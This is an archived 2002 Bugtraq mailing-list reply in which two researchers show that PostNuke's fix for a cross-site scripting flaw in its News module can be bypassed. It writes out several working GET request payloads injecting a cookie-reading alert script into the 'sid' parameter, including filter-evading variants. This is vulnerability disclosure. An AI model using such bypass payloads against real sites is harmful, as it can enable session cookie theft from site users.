Bugtraq mailing list archives
Re: Postnuke XSS fixed
From: Sebastian Konstanty Zdrojewski <s.zdrojewski () not2you com>
Date: Thu, 03 Oct 2002 09:10:23 +0200
I saw the problem has been solved, and the get you proposed below are no more working. But if you use the following get, the popup appears again: on the url http://news.postnuke.com/modules.php the get ?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script+> Best Regars, Sebastian Daniel Woods wrote: >Humm! > > > > >Not so fast on the praise :( > >It only took me a couple of workarounds to find ways to bypass the check. > > http://news.postnuke.com/modules.php > ?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script> > >Using the request... > ?op=modload&name=News&file=article&sid=<\script>alert(document.cookie);</script> >gives me the DB Error: message > >And using the request... > ?op=modload&name=News&file=article&sid=<script+>alert(document.cookie);</script> >gives me the Alert Popup and DB Error: message... the '+' is treated as a blank. > >Thanks... Dan. > > > -- Sebastian Konstanty Zdrojewski IT Analyst Neticon a brand of Every Level S.r.l. Via Valtellina 16 - 20159 Milano - MI - Italy Phone (+39) 02.68.80.731 E-Mail s.zdrojewski () neticon it Website http://www.neticon.it
Current thread:
- Postnuke XSS fixed Muhammad Faisal Rauf Danka (Oct 02)
- Re: Postnuke XSS fixed Daniel Woods (Oct 02)
- Re: Postnuke XSS fixed Sebastian Konstanty Zdrojewski (Oct 03)
- <Possible follow-ups>
- Re: Postnuke XSS fixed Muhammad Faisal Rauf Danka (Oct 03)
- Re: Postnuke XSS fixed Muhammad Faisal Rauf Danka (Oct 07)
- Re: Postnuke XSS fixed Daniel Woods (Oct 02)